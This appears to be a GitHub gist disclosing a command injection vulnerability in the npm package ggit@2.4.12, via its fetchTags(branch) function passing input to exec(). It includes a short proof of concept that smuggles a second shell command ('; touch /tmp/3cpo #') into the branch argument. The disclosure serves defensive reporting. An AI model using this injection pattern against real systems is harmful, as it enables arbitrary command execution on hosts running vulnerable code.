Skip to content

Instantly share code, notes, and snippets.

@lirantal

lirantal/ggit-command-injection.md Secret

Created April 21, 2023 12:36
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save lirantal/d8f87b366d2078e6118ab7bf2b005f02 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save lirantal/d8f87b366d2078e6118ab7bf2b005f02 to your computer and use it in GitHub Desktop.
Download ZIP
Command Injection vulnerability in `ggit@2.4.12`
Raw
ggit-command-injection.md

Command Injection vulnerability in ggit@2.4.12

ggit describes itself as:

Local promise-returning git command wrappers

Resources:

Background on exploitation

I'm reporting a Command Injection vulnerability in ggit npm package.

This vulnerability manifests with the library's fetchTags(branch) API, which allows user input to specify the branch to be fetched and then concatenates this string along with a git command which is then passed to the unsafe exec() Node.js child process API.

Exploit

  1. Install ggit@2.4.12 or earlier
  2. Establish the following POC:
const fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
  // should be same as running command
  // git pull origin --tags
  console.log("done");
});
  1. Observe new file created on disk at /tmp/3cpo

Author

Liran Tal

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment